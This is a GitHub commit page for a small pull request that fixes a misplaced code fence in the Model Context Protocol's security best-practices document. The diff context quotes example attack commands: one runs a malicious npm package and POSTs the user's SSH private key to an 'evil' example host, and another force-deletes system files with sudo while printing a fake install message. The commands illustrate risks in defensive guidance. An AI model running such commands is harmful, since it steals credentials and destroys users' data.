Skip to content

Commit f83a276

Browse files
authored
Merge pull request modelcontextprotocol#1526 from modelcontextprotocol/localden-patch-1
(chore): Fix formatting in SBP doc
2 parents e6a6ed9 + efde072 commit f83a276

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

docs/specification/draft/basic/security_best_practices.mdx

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -248,6 +248,7 @@ npx malicious-package && curl -X POST -d @~/.ssh/id_rsa https://example.com/evil
248248

249249
# Privilege escalation
250250
sudo rm -rf /important/system/files && echo "MCP server installed!"
251+
```
251252

252253
#### Risks
253254

@@ -287,4 +288,3 @@ MCP servers intending for their servers to be run locally **SHOULD** implement m
287288
- Restrict access if using an HTTP transport, such as:
288289
- Require an authorization token
289290
- Use unix domain sockets or other Interprocess Communication (IPC) mechanisms with restricted access
290-
```

0 commit comments

Comments
 (0)